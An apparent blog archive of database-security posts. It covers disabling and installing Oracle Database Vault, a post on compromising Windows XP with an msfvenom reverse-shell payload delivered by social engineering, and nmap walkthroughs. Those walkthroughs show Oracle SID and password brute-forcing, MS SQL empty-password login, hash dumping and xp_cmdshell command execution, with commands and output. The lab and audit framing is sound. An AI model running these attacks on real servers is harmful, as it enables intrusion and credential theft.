realm_name => ‘Database Vault Account Management’,
description => ‘Defines the realm for administrators who create and manage database accounts and profiles.’,
enabled => ‘N’,
audit_options => 1);
END;
/
BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => ‘Oracle Enterprise Manager’,
description => ‘Defines the Enterprise Manager monitoring and management realm.’,
enabled => ‘N’,
audit_options => 1);
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => ‘Oracle Default Schema Protection Realm’,
description => ‘Defines the realm for the Oracle Default schemas.’,
enabled => ‘N’,
audit_options => 1);
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => ‘Oracle System Privilege and Role Management Realm’,
description => ‘Defines the realm to control granting of system privileges and database administrator roles.’,
enabled => ‘N’,
audit_options => 1);
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => ‘Oracle Default Component Protection Realm’,
description => ‘Defines the realm to protect default components of the Oracle database.’,
enabled => ‘N’,
audit_options => 1);
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => ‘Oracle System Privilege and Role Management Realm’,
description => ‘Defines the realm to control granting of system privileges and database administrator roles.’,
enabled => ‘N’,
audit_options => 1);
END;
/

select * from dvsys.DBA_DV_COMMAND_RULE;

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => ‘ALTER PROFILE’,
rule_set_name => ‘Can Maintain Accounts/Profiles’,
object_owner => ‘%’,
object_name => ‘%’,
enabled => ‘N’);
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => ‘ALTER SYSTEM’,
rule_set_name => ‘Allow Fine Grained Control of System Parameters’,
object_owner => ‘%’,
object_name => ‘%’,
enabled => ‘N’);
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => ‘ALTER USER’,
rule_set_name => ‘Can Maintain Own Account’,
object_owner => ‘%’,
object_name => ‘%’,
enabled => ‘N’);
commit;
END;
/
BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => ‘CHANGE PASSWORD’,
rule_set_name => ‘Can Maintain Own Account’,
object_owner => ‘%’,
object_name => ‘%’,
enabled => ‘N’);
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => ‘CREATE PROFILE’,
rule_set_name => ‘Can Maintain Accounts/Profiles’,
object_owner => ‘%’,
object_name => ‘%’,
enabled => ‘N’);
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => ‘CREATE USER’,
rule_set_name => ‘Can Maintain Accounts/Profiles’,
object_owner => ‘%’,
object_name => ‘%’,
enabled => ‘N’);
commit;
END;
/
BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => ‘DROP PROFILE’,
rule_set_name => ‘Can Maintain Accounts/Profiles’,
object_owner => ‘%’,
object_name => ‘%’,
enabled => ‘N’);
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => ‘DROP USER’,
rule_set_name => ‘Can Maintain Accounts/Profiles’,
object_owner => ‘%’,
object_name => ‘%’,
enabled => ‘N’);
commit;
END;
/

commit;

 

6. Make Recyclebin On

After DB vault installation Oracle makes recyclebin off for some security reason. If you want you can make it on  again. You can use below script.

Connect dvowner

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => ‘ALTER SYSTEM’,
rule_set_name => ‘Allow Fine Grained Control of System Parameters’,
object_owner => ‘%’,
object_name => ‘%’,
enabled => ‘N’);
commit;
END;
/

Connect sys as sysdba

alter system set recyclebin=on scope=spfile;

startup force;

You can make ALTER SYSTEM Command Rule enable again

Connect dvowner

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => ‘ALTER SYSTEM’,
rule_set_name => ‘Allow Fine Grained Control of System Parameters’,
object_owner => ‘%’,
object_name => ‘%’,
enabled => ‘Y’);
commit;
END;
/

 

 

 

 

Installing DB Vault to an Oracle 12c non-Container Database

Capture

At this note I will show you how you can install DB Vault to Oracle 12c non-container database. For Oracle 12c container databases  I will write another post.

First Let me introduce the environment;

Host : Oracle 7 Linux virtual  machine on Oracle VM Virtual Box

DB : Oracle 12c 12.1.0.2.0 non-container database.

At Oracle  12c Oracle Label Security and DB vault options are already linked with Oracle binary. But sometimes DBAs do not install these options during DB creation. At this time you should install this options and then you can register DB vault.

0. Check Oracle Label Security and DB Vault Options are installed

To check Oracle Label security And DB Vault use below SQL;

SQL> select comp_id,status from dba_registry where comp_id in (‘OLS’,’DV’);

no rows selected

IF “no rows selected” returns from the SQL ; It means you should install Oracle Label Security and Oracle DB Vault.

IF ORACLE LABEL SECURITY and DB VAULT IS NOT INSTALLED  Please follow below notes to complete DB vault installation

https://yusufanilakduygu.wordpress.com/2016/08/21/adding-oracle-label-security-and-db-vault-options-to-oracle-12c-database/

 

Otherwise ; Just register Oracle DB Vault .  Follow this note ; and finish the installation.

1.Check DB vault if already registered

SQL> column parameter format a25
SQL> column value format a10
SQL> SELECT parameter,value FROM gv$OPTION WHERE PARAMETER in
( ‘Oracle Database Vault’,’Oracle Label Security’);

PARAMETER VALUE
————————- ———-
Oracle Label Security FALSE
Oracle Database Vault FALSE

SQL>

 

As you see DB vault  has not been registered yet. After registering DB vault the value column will be TRUE

2. Take  backup of  some tables and views.

Before  DB vault registration;  Some privileges from DBA role, IMP_FULL_DATABASE role and  SCHEDULER_ADMIN role are revoked. At the same time some critical privileges are revoked as well. Therefore We should take a copy of some tables about privileges . I advice you should backup these with CREATE TABLE command.

 

I took the copy of the tables at SYSTEM user.

SQL> connect system
Enter password:
Connected.
SQL> create table a_dba_network_acls as select * FROM cdb_network_acls;

Table created.

SQL> create table a_dba_network_acl_privileges as select * from cdb_network_acl_privileges;

Table created.

SQL> create table a_gv$parameter as select * from gv$parameter ;

Table created.

SQL> create table a_dba_tab_privs as Select * from dba_tab_privs;

Table created.

SQL> create table a_dba_sys_privs as Select * from dba_sys_privs;

Table created.

SQL> create table a_dba_role_privs as Select * from dba_role_privs;

Table created.

SQL> create table a_dba_objects as select owner,object_name,object_type from dba_objects where status=’INVALID’ and object_type <> ‘SYNONYM’ ;

Table created.

SQL> create table a_dba_registry as select * from dba_registry;

Table created.

SQL>

3. Create DB Vault owner and User Administrator users

At DB Vault registration you should create one user to administer DB vault and one user to manage Oracle users at the database. These two users are required for the separation of duties.

SQL> connect sys as sysdba
Enter password:
Connected.
SQL> CREATE USER dvowner IDENTIFIED BY oracle
2 DEFAULT TABLESPACE USERS
3 QUOTA UNLIMITED ON USERS;

User created.

SQL> GRANT CREATE SESSION TO dvowner;

Grant succeeded.

SQL> CREATE USER dvacctmngr IDENTIFIED BY oracle
2 DEFAULT TABLESPACE USERS
3 QUOTA UNLIMITED ON USERS;

User created.

SQL> GRANT CREATE SESSION TO dvowner;

Grant succeeded.

SQL>

 

4. Configure DB Vault

Now we can start to register DB Vault by configuring it. Afterwards we will compile all invalid objects at the database

connect sys as sysdba
Enter password:
Connected.

SQL> BEGIN
2 DVSYS.CONFIGURE_DV (
3 dvowner_uname => ‘dvowner’,
4 dvacctmgr_uname => ‘dvacctmngr’);
5 END;
6 /

PL/SQL procedure successfully completed.

SQL> @?/rdbms/admin/utlrp.sql

.

.

…Database user “SYS”, database schema “APEX_040200”, user# “98” 21:39:56
…Compiled 0 out of 3014 objects considered, 0 failed compilation 21:39:56
…271 packages
…263 package bodies
…452 tables
…11 functions
…16 procedures
…3 sequences
…457 triggers
…1320 indexes
…211 views
…0 libraries
…6 types
…0 type bodies
…0 operators
…0 index types
…Begin key object existence check 21:39:56
…Completed key object existence check 21:39:57
…Setting DBMS Registry 21:39:57
…Setting DBMS Registry Complete 21:39:57
…Exiting validate 21:39:57

PL/SQL procedure successfully completed.

5. Enable DB Vault

SQL> CONNECT dvowner
Enter password:
Connected.
SQL> EXEC DBMS_MACADM.ENABLE_DV;

PL/SQL procedure successfully completed.

SQL> commit;

Commit complete.

6. Startup the Database and the installation is finished

SQL> connect sys as sysdba
Enter password:
Connected.
SQL> startup force
ORACLE instance started.

Total System Global Area 977272832 bytes
Fixed Size 2931520 bytes
Variable Size 666895552 bytes
Database Buffers 301989888 bytes
Redo Buffers 5455872 bytes
Database mounted.
Database opened.

SQL> column parameter format a25
SQL> column value format a10
SQL> SELECT parameter,value FROM gv$OPTION WHERE PARAMETER in
2 ( ‘Oracle Database Vault’,’Oracle Label Security’);

PARAMETER VALUE
————————- ———-
Oracle Label Security TRUE
Oracle Database Vault TRUE

As you see DB Vault Vault is ready for use. At the next note I will show you what you can do after installation of DB Vault.

 

 

 

 

 

Hacking Windows XP with msfvenom

venom-02

msfvenom is a program which generates shellcodes to penetrate any machines. At this note I will show you how you can penetrate into  windows XP with shellcodes which are produced by msfvenom.

Before msfvenom  ; msfpayload and msfencode programs were used. But now msfpayload and msfencode are obsolete and they are not supported . Therefore we should use msfvenom.

At the examples I will use two machines ; one of it is Kali  and the other machine is Windows XP. I will produce shellcodes at Kali machine and I will send it to Windows XP machine ( you can use any social enginnering methods ). But at the example simple I will move it with ftp or any other means. Because the aim of the note is to show you all penetration process. An important note is during  the penetration client-side antivirus program should be disabled . There are many ways to bypass antivirus programs but this not the scope of this note.

First ; look at the options of the msfvenom program.

venom-01

As you can see tehere many options at msfvenom program.

Now create shellcode with a simplest  method.

venom11

If you look at the command line you will see some parameters. The most important parameter is the LHOST parameter. This parameter show the IP address of Kali machines. When someone else starts this program at Windows XP machine; this shellcode will try to connect to Kali machine ( 192.200.11.5 ). But before the shellcode connects to Kali machine , we should start a listener program which waits for connetions from shellcodes. We will start a listener with metasploit framework ( msfconsole )

Now our shell code is ready ; and you can send it any computer with social engineering. Imagine that we send it with email and the e-mail reader will start it by anymeans.

Now we will start a listener to penetrate into Windows XP machine by msfconsole. First start msfconsole

venom-02

msfconsole is a centralized console for metasploits.

set up our listener in msfconsole and wait for a back connection. And then use reverse_tcp payload to start listener.

venom-03

Now the listener is waiting for shellcode to penetrate into Windows XP machine ( in which our shellcode stays)

Now start the x.exe at Windows XP by double-clicking it.

venom-04.

Go back to Kali and you will see back-connection is established and meterpeter is started. Now we are connected to Windows XP machine.

venom-05

Afterwords we are in Windows XP machine and we can successfully control the remote penetrated machine.

After penetrating you are in post-exploitation phase and I will deeply show this phase in a different note.

venom-06.JPG

Anıl Akduygu

 

 

 

 

 

Oracle Security checks with nmap

Capture.JPGIntroduction

Nmap is open -source utility to discover and check network security. Normally nmap is developed for network security. Many  externel scripts were added to nmap to check databases, web servers and other systems at IT infrastructure.

At this note; I will present nmap scripts which are developed to check Oracle databases. I will explain all details  with samples. For this note; I used two virtual machines ; one of it as you expected is Kali the other machine is Oracle Linux which runs Oracle 11g database.

Start with guessing Oracle SID

Guess Oracle SID

oracle-sid-brute script guesses Oracle instance/SID names.

/usr/share/nmap/nselib/data/oracle-sids file includes some Oracle SIDs . By this list nmap makes brute force to find Oracle SIDs

Capture

 

Now try to find Oracle-SID at localhost7  with nmap oracle-sid-brute script.

———————————————————–

nmap –script=oracle-sid-brute -p 1521-1900 localhost7

Not shown: 359 filtered ports
PORT STATE SERVICE
1521/tcp open oracle
| oracle-sid-brute:
|_ DB2TEST
1522/tcp open rna-lm
1523/tcp open cichild-lm
1530/tcp open unknown
1545/tcp open vistium-share
1555/tcp open unknown
1556/tcp open veritas_pbx
1557/tcp open unknown
1560/tcp open asci-val
1563/tcp open unknown
1575/tcp open unknown
1585/tcp open unknown
1591/tcp open unknown
1621/tcp open unknown
1681/tcp open unknown
1731/tcp open unknown
1733/tcp open unknown
1831/tcp open unknown
1890/tcp open unknown
1898/tcp open unknown
1899/tcp open unknown

——————————————————————-

Gotcha we found it DB2TEST. If you have your own Oracle -SID list at /path/sidfile you can use it like this.

nmap –script=oracle-sid-brute –script-args=oraclesids=/path/sidfile -p 1521-1800 <hostname>

Now we will try to guess Oracle usernames and passwords.

Password guess Brute Force

oracle-brute script checks common Oracle usernames and passwords. The list of common Oracle username and passwords can be found at /usr/share/nmap/nselib/data/oracle-default-accounts.lst file.

———————————————————–

nmap -p1521 –script oracle-brute –script-args oracle-brute.sid=DB11G 192.200.11.9

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-07-02 10:19 EDT
Nmap scan report for 192.200.11.9
Host is up (0.0010s latency).
PORT STATE SERVICE
1521/tcp open oracle
| oracle-brute:
| Accounts:
| DIP:DIP – Account is locked
| XDB:CHANGE_ON_INSTALL – Account is locked
|_ Statistics: Performed 695 guesses in 13 seconds, average tps: 53

Nmap done: 1 IP address (1 host up) scanned in 30.89 second

————————————————————–

As you see two users are found but they are locked. Our database passed this test. But If the administrators had forgotten these common usernames this script would help us to find these usernames.

If you have some special usernames and passwords list at a special  path; you can use below command

nmap -sV –script oracle-brute –script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt <target>

 

To quit after finding one valid account, use the argument brute.firstOnly:
nmap -sV –script oracle-brute –script-args brute.firstOnly <target>

To set a different timeout limit, use the argument unpwd.timelimit. To run it
indefinitely, set it to 0:

nmap -sV –script oracle-brute –script-args unpwdb.timelimit=0 <target>$ nmap -sV –script oracle-brute –script-args unpwdb.timelimit=60m <target>

Brute modes

user: For each user listed in userdb, every password in passdb will be tried
nmap –script oracle-brute –script-args brute.mode=user <target>

pass: For each password listed in passdb, every user in userdb will be tried
nmap –script oracle-brute –script-args brute.mode=pass <target>

For Oracle tns poison attack you can read my another article

https://yusufanilakduygu.wordpress.com/2016/06/12/oracle-tns-poison-attack/

Now this is the end of this note.

I hope this note will give you a new perspective for Oracle Database security.

Anıl Akduygu

 

Control MS SQL Server security with nmap

Capture

At nmap there are many valuable scripts to control the secuirty  MS SQL server database. at this note I will show you how you can audit your SQL server with nmap

Check sa account with null password

ms-sql-empty-password

Attempts to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.

One example

 

nmap -p 1433 –script ms-sql-empty-password 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-12 12:41 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00064s latency).

PORT     STATE SERVICE

1433/tcp open  ms-sql-s

| ms-sql-empty-password:

|   [192.200.11.11:1433]

|_    sa:<empty> => Login Success

MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 17.5

 

If port 445 ( microsoft-ds service )  is open

nmap -p 445 –script ms-sql-empty-password –script-args mssql.instance-all 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-12 12:44 EDT

Nmap scan report for 192.200.11.11

Host is up (0.00059s latency).

PORT    STATE SERVICE

445/tcp open  microsoft-ds

MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)

 

Host script results:

| ms-sql-empty-password:

|   [192.200.11.11:1433]

 

Brute Force attacks

nmap -p1433 –script ms-sql-brute 192.200.11.11

Host is up, received arp-response (0.00064s latency).

Scanned at 2016-06-12 12:20:41 EDT for 157s

PORT     STATE SERVICE  REASON

1433/tcp open  ms-sql-s syn-ack ttl 128

| ms-sql-brute:

|   [192.200.11.11:1433]

|_    No credentials found

MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)

Final times for host: srtt: 636 rttvar: 3138  to: 100000

Dumping the password hashes of an MS SQL server

 

If sa password is null

nmap -p1433 –script ms-sql-empty-password,ms-sql-dump-hashes 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-19 05:03 EDT

Nmap scan report for 192.200.11.11

Host is up (0.016s latency).

PORT     STATE SERVICE

1433/tcp open  ms-sql-s

| ms-sql-dump-hashes:

| [192.200.11.11:1433]

|     sa:0x0200EC357FC5FA85256C4BC37667845B81E84C0F3CA9E7AD2BC7FB94FB698E5243FC5112C2B240884C44E71FD45195BB60B4AAF63D24B909C5945285793D0605E4D09E886849

|     ##MS_PolicyTsqlExecutionLogin##:0x0200251457811E7CB37A8C9746EC742325673A60D16B98DF182FCF7E4410A2FB1B03C36B2E60A68BB269C7D47B3C43F6CB485365CF5D171A48171B6DA6DB74CDEA40759E9DFC

|     ##MS_PolicyEventProcessingLogin##:0x0200F8A9BBBADB33E242C190EE82D15BB47564F46C5BF7B29B0124F32DCFF96837F9F243BD054F0A0D2B8D5C4D95F885B30EAA47F94F7FBBD3EA613DF64F05E14659742EB868

Getting Information

Attempts to determine configuration and version information for Microsoft SQL Server instances.

No credentials are required

nmap -p1433-1900 –script ms-sql-info 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-12 11:55 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00096s latency).
Not shown: 467 closed ports
PORT STATE SERVICE
1433/tcp open ms-sql-s
MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)

Host script results:
| ms-sql-info:
| 192.200.11.11:1433:
| Version:
| number: 11.00.3128.00
| Post-SP patches applied: true
| Service pack level: SP1
| Product: Microsoft SQL Server 2012
| name: Microsoft SQL Server 2012 SP1+
|_ TCP port: 1433

 

Running command shell on MS SQL servers

To run dir command on windows server , if the sa account password is null,

nmap -p 1433 –script ms-sql-xp-cmdshell –script-args mssql.username=sa,mssql.password=”,ms-sql-xp-cmdshell.cmd=”dir” 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-19 05:38 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00046s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-xp-cmdshell:
| [192.200.11.11:1433]
| Command: dir
| output
| ======
| Volume in drive C has no label.
| Volume Serial Number is 1E1E-6DAB
| Null
| Directory of C:\Windows\system32
| Null
| 19/06/2016 01:51 <DIR> .
| 19/06/2016 01:51 <DIR> ..
| 30/09/2013 16:44 <DIR> 0409
| 02/01/2016 12:33 <DIR> 1033
| 18/06/2013 07:48 160 @OpenWithToastLogo.png
| 18/06/2013 08:04 120 @TileEmpty1x1Image.png
| 22/08/2013 03:39 3,812,352 accessibilitycpl.dll
| 22/08/2013 04:45 39,424 ACCTRES.dll

 

Running SQL Query

Runs a query against Microsoft SQL Server (ms-sql).

 

nmap -p 1433 –script ms-sql-query –script-args mssql.username=sa,mssql.password=”,ms-sql-query.query=”SELECT * FROM syslogins” 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-19 06:02 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00060s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-query:
| [192.200.11.11:1433]
| Query: SELECT * FROM syslogins
| sid status createdate updatedate accdate totcpu totio spacelimit timelimit resultlimit name dbname password language denylogin hasaccess isntname isntgroup isntuser sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin loginname
| === ====== ========== ========== ======= ====== ===== ========== ========= =========== ==== ====== ======== ======== ========= ========= ======== ========= ======== ======== ============= =========== ========== ============ ========= ========= ========= =========
| 0x01 9 Apr 08, 2003 14:10:35 Jun 12, 2016 14:50:31 Apr 08, 2003 14:10:35 0 0 0 00sa master \x02\xEC\x7F\xFA%Kv\x84\x81L<\xE7+\xFB\xFB\x8ECQ\xC2@L\xE7\xD4\x95`\xAA=\xB9\xC5Ry\x06\xE4\x9Eh us_english0 1 0 0 0 1 0 0 0 0 0 0 0 sa
| 0x0106000000000009010000005FB6DAC7F7DB546D706711B128B5063888B01770 10 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 0 0 0 0 0 ##MS_SQLResourceSigningCertificate## master Null Null 0 0 0 0 0 0 0 0 0 0 0 0 0##MS_SQLResourceSigningCertificate##
| 0x010600000000000901000000A0B7FCD6F6D5FA771521910A3B71A750568D6275 10 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 0 0 0 0 0 ##MS_SQLReplicationSigningCertificate## master Null Null 0 0 0 0 0 0 0 0 0 0 0 0 0##MS_SQLReplicationSigningCertificate##
| 0x010600000000000901000000C2FB1C6E4485BB1056EBC85FD2CC2AD081390316 10 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 0 0 0 0 0 ##MS_SQLAuthenticatorCertificate## master Null Null 0 0 0 0 0 0 0 0 0 0 0 0 0##MS_SQLAuthenticatorCertificate##